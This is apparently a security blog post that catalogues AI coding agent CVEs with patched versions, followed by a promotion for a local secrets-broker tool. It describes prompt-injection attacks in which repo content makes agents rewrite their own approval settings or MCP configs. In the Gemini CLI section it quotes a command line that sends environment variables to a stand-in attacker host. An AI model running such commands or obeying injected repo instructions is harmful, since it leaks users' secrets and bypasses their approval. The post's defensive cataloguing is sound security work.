The AI coding agent CVE index for 2026Every real vulnerability and the version that fixed it
Most of the AI coding agent CVEs from 2025 and 2026 are the same bug wearing different logos: untrusted repo content writes a config file or slips past an allowlist, and the agent runs a command you never approved. This is the catalog, with affected and patched versions for each.
-
01
Source
Untrusted repo
A cloned project, a GitHub issue, a README, an MCP config
attacker-controlled text -
02
Channel
Config write
settings.json, .cursor/mcp.json, hooks, or a naive allowlist parse
approval flag flipped -
03
Exposure
Silent RCE
Command runs, env vars and API keys leave the machine
no prompt shown
TL;DR· the answer, in twenty seconds
What happened: Between mid-2025 and early 2026, every major coding agent shipped at least one remote-code-execution or data-exfiltration CVE. Claude Code has four, Cursor has two, Copilot has one, and Gemini CLI had a critical bug that never got a CVE number at all.
The minimum fix: Be on Claude Code 2.0.65+, Cursor 1.3+, Gemini CLI 0.1.14+, and a Copilot/VS Code build patched after August 2025. The table near the end lists every affected and patched version.
The lesson: These are not seven unrelated bugs. They are one design pattern - the agent treats repo content as trusted input to its own config - found seven times. Patching helps; assuming untrusted code is benign does not.
This page lists the CVEs that actually affect AI coding agents, what each one does, which versions are vulnerable, and the version that patches it. No hype and no invented severities. If you run a coding agent, the only question that matters is whether you are on a patched build, and that answer lives in a changelog, not a press release.
I built this because the coverage is a mess. The same CVE gets three different CVSS scores across three vendor databases, half the blog posts conflate Claude Code's four separate issues into one, and the single most instructive bug in the set, the Gemini CLI flaw, never received a CVE number, so it falls out of every list that filters by identifier. A reference page should fix all of that in one place.
The same bug, found seven times
Read the disclosures back to back and a pattern jumps out. Almost none of these are memory-corruption bugs or clever cryptographic breaks. They are approval bypasses. An agent has a security gate, a prompt that says "this command wants to run, is that okay?", and the bug is that untrusted content in the working directory flips the gate off before you see it.
The untrusted content arrives through whatever the agent reads: a README.md, a GitHub issue, a project config file, an MCP server definition. The agent ingests it, treats embedded instructions as its own, and writes to a file that controls its behavior. GitHub Copilot wrote chat.tools.autoApprove: true into .vscode/settings.json. Cursor wrote a malicious server into .cursor/mcp.json. Claude Code executed shell commands from project config before its trust dialog finished loading. Gemini CLI parsed a command string badly, so a payload hidden after a grep rode through on the allowlist.
OWASP files this under its agentic Top 10 as a mix of prompt injection and excessive agency, and that framing is correct, but the operational takeaway is simpler. Any agent that can edit its own configuration from inside a repo can be told to stop asking permission. The CVEs below are seven instances of that one sentence.
The Claude Code cluster
Claude Code has the longest list, partly because it has had the most scrutiny. Four CVEs, two disclosure events.
The first pair came from Cymulate researcher Elad Beber, disclosed August 4, 2025 under the name InversePrompt. CVE-2025-54794 is a path restriction bypass, CVSS 7.7. Claude Code sandboxes file operations to the current working directory using a prefix check, and a prefix check is not a containment boundary. A directory named /Users/dev/project_evil passes a prefix test against /Users/dev/project, so the sandbox leaks into sibling directories. Fixed in version 0.2.111 with canonical path comparison. CVE-2025-54795 is command injection, CVSS 8.7, and it is the more serious of the two: the input sanitizer that enforced the command allowlist could be fooled by embedding a real command between two harmless ones, so a payload tucked between two echo calls executed without the confirmation prompt. Wiz tracks it as an approval-bypass RCE. Fixed in version 1.0.20.
The second pair came from Check Point Research months later. CVE-2025-59536, CVSS 8.7, is a code-injection flaw in the startup trust dialog. The dialog is supposed to gate execution of an untrusted project until you click "trust", but a race in the implementation let shell commands in repository config files run before the dialog finished its check. SentinelOne's database pins the affected range at versions before 1.0.111. Its sibling, CVE-2026-21852, CVSS 5.3, is the quieter one: an information-disclosure bug in the project-load flow that let a malicious repo exfiltrate data including Anthropic API keys. Check Point's writeup, "Caught in the Hook", walks both. The API-key exfiltration path is fixed in version 2.0.65, shipped January 2026, which is the real floor for Claude Code: below it, a repo you clone can read your key.
If you only remember one number for Claude Code, remember 2.0.65. Everything below it is exposed to at least one of these four.
Cursor: CurXecute and MCPoison
Cursor disclosed two CVEs within days of each other in early August 2025, both fixed in version 1.3.
CVE-2025-54135, "CurXecute", CVSS 8.6, came from Aim Security. Indirect prompt injection, the kind that arrives in a file Cursor reads rather than something you type, let an attacker create and execute an MCP configuration without confirmation. The detail that makes it nasty: proposed changes were written to disk and executed before the user could approve or reject them, so the review step protected nothing. Tenable's FAQ has the clean writeup.
CVE-2025-54136, "MCPoison", CVSS 7.2, came from Check Point and is a time-of-check-to-time-of-use bug. Cursor used a one-time approval model for MCP configs: approve a server once and Cursor stops re-validating it. An attacker commits a benign MCP config to a shared repo, waits for a teammate to approve it, then swaps the contents for something malicious. The approval sticks; the payload does not get re-checked. Version 1.3 made confirmation mandatory on every config change. If you collaborate in shared repos, MCPoison is the one to care about, because the attack is patient and the approval you are reusing might be a week old.
Cursor's changelog is the authoritative source for the fix. Target 1.3.9 or later.
Copilot, Gemini CLI, and the one without a number
CVE-2025-53773 hits GitHub Copilot in VS Code agent mode. Johann Rehberger documented it on Embrace The Red: a prompt injection, planted in source code or a GitHub issue, gets Copilot to write "chat.tools.autoApprove": true into .vscode/settings.json, which turns on a "YOLO mode" where Copilot runs shell commands without asking. Rehberger showed it was model-agnostic, working against Copilot backed by GPT-4.1, Claude Sonnet, and Gemini, and that it was wormable, since the injected instructions can tell the agent to plant the same payload in the next repo. Microsoft patched it in the August 2025 Patch Tuesday. NVD scores it 7.8, some vendor databases higher; the score matters less than the patch date. Anything from before August 2025 is exposed.
Then there is the Gemini CLI bug, which is the most educational of the set and has no CVE at all. Google tracked it internally as Priority One, Severity One, but never assigned a CVE identifier, so it is missing from every index that keys on CVE numbers. Tracebit found it two days after Gemini CLI launched on June 25, 2025. The allowlist parser pulled the "root" command off a shell string with logic too crude to enforce a security boundary: a string that started with grep was trusted as grep, so grep ... ; curl evil.com -d "$(env)" ran the exfiltration half on the allowlist's good name. Whitespace tricks hid the payload from the terminal display. BleepingComputer's coverage has the timeline. Fixed in version 0.1.14, released July 25, 2025. The lesson outlives the bug: an allowlist is only as good as the parser that decides what counts as an allowed command, and "starts with grep" is not a parser.
The ancestor of this whole class deserves a name. EchoLeak, CVE-2025-32711, CVSS 9.3, was the zero-click indirect prompt injection in Microsoft 365 Copilot that The Hacker News covered in June 2025. It is not a coding agent, so it is out of scope for the table below, but it is the first documented case of prompt injection weaponized for real data exfiltration in a production AI system. Aim Security named the class "LLM Scope Violation": the model has no enforced boundary between trusted instructions and untrusted data, so external content can drive privileged actions. Every coding agent CVE above is a corollary of that one structural fact. Microsoft fixed EchoLeak server-side, so there is no version for you to chase, but it is the reason the rest of this list exists.
Check your versions
The fastest audit is a version check against the patched-version floor. Run whichever of these apply to your stack:
# Claude Code - need 2.0.65 or later (the API-key exfil fix)
claude --version
# Cursor - need 1.3.9 or later; check Cursor > About, or:
cursor --version
# Gemini CLI - need 0.1.14 or later
gemini --version # or: npm ls -g @google/gemini-cli
# GitHub Copilot in VS Code - update VS Code and the Copilot extension
code --version
code --list-extensions --show-versions | grep -i copilotThe minimum safe versions, with the CVE each one closes:
| Agent | CVE(s) | Class | CVSS | Affected | Patched in |
|---|---|---|---|---|---|
| Claude Code | CVE-2025-54794 | Path restriction bypass | 7.7 | < 0.2.111 | 0.2.111 |
| Claude Code | CVE-2025-54795 | Command injection / approval bypass | 8.7 | < 1.0.20 | 1.0.20 |
| Claude Code | CVE-2025-59536 | Trust-dialog code injection (race) | 8.7 | < 1.0.111 | 1.0.111 |
| Claude Code | CVE-2026-21852 | API key exfiltration on project load | 5.3 | < 2.0.65 | 2.0.65 |
| Cursor | CVE-2025-54135 (CurXecute) | Prompt injection writes MCP config, RCE | 8.6 | < 1.3 | 1.3 |
| Cursor | CVE-2025-54136 (MCPoison) | MCP config approval TOCTOU | 7.2 | < 1.3 | 1.3 |
| GitHub Copilot / VS Code | CVE-2025-53773 | Agent-mode prompt injection, RCE | 7.8 | pre-Aug 2025 | Aug 2025 Patch Tuesday |
| Gemini CLI | none assigned (Google P1/S1) | Allowlist parse bypass, silent exec/exfil | n/a | < 0.1.14 | 0.1.14 |
Two cross-agent notes. First, CVSS scores in this table follow the disclosing vendor or the database I linked; you will find different numbers elsewhere, because NVD, the vendor, and aggregators each score on their own. Treat the number as a rough rank, not gospel. Second, "patched" closes the specific CVE. It does not close the class. The Comment-and-Control research that Aonan Guan documented hit Claude Code, Gemini CLI, and Copilot with one prompt injection technique well after all three had shipped these patches, because the underlying problem, an agent that trusts repo content, is a design choice and not a bug you can version away.
What this means for your stack
Pin a floor and enforce it. Decide the minimum version for every agent your team runs, write it down, and check it in CI or in onboarding the same way you check a Node or Python version. The table above is your starting floor. This costs an afternoon and closes every CVE on this page.
Then accept that patching is the easy half. The hard half is that these tools execute commands derived from text they read, and you keep pointing them at untrusted text: repos you cloned, issues strangers filed, MCP servers you found on a registry. The architectural fix is to stop relying on the agent's own approval prompt as your security boundary and put the boundary outside the agent, where a poisoned config file cannot reach it. That means least-privilege credentials the agent never holds in plaintext, an allowlist enforced by something other than the agent's parser, and an audit log the agent cannot edit.
hasp is one working implementation of the credential half: it brokers secrets to a child process at runtime so the agent runs commands that need a key without the key ever entering its context, and a malicious repo config has nothing to read. brew install hasp or grab a binary. Source-available (FCL-1.0), local-first, macOS and Linux, no account.
Whatever you use, the move is the same: update to the floor today, and stop treating "the agent asked me first" as proof the agent will ask next time. Seven CVEs say it will not.
Sources· cited above, in one place
- Check Point Research Claude Code command-injection disclosure (CVE-2025-59536)
- CVE-2025-59536 Claude Code command injection
- Aonan Guan Comment and Control: prompt injection to credential theft in Claude Code, Gemini CLI, and GitHub Copilot
- Cursor Changelog and security notes
- Visual Studio Code Extension security model and Copilot security guidance
- Anthropic Security advisories and Claude Code release notes
- OWASP GenAI Security Project Top 10 for Agentic Applications 2026 (ASI01-ASI10)
Stop handing the agent your real keys.
hasp keeps secrets in one local encrypted vault, brokers them into the child process at exec, and never lets the agent read the value.
- Local, encrypted vault — no account, no cloud, no telemetry by default.
- Brokered run — agent gets a reference, the child process gets the value.
- Pre-commit + pre-push hooks catch managed values before they ship.
- Append-only HMAC audit log answers "did the agent touch the prod token?" in seconds.
macOS & Linux. Source-available (FCL-1.0, converts to Apache 2.0). No account.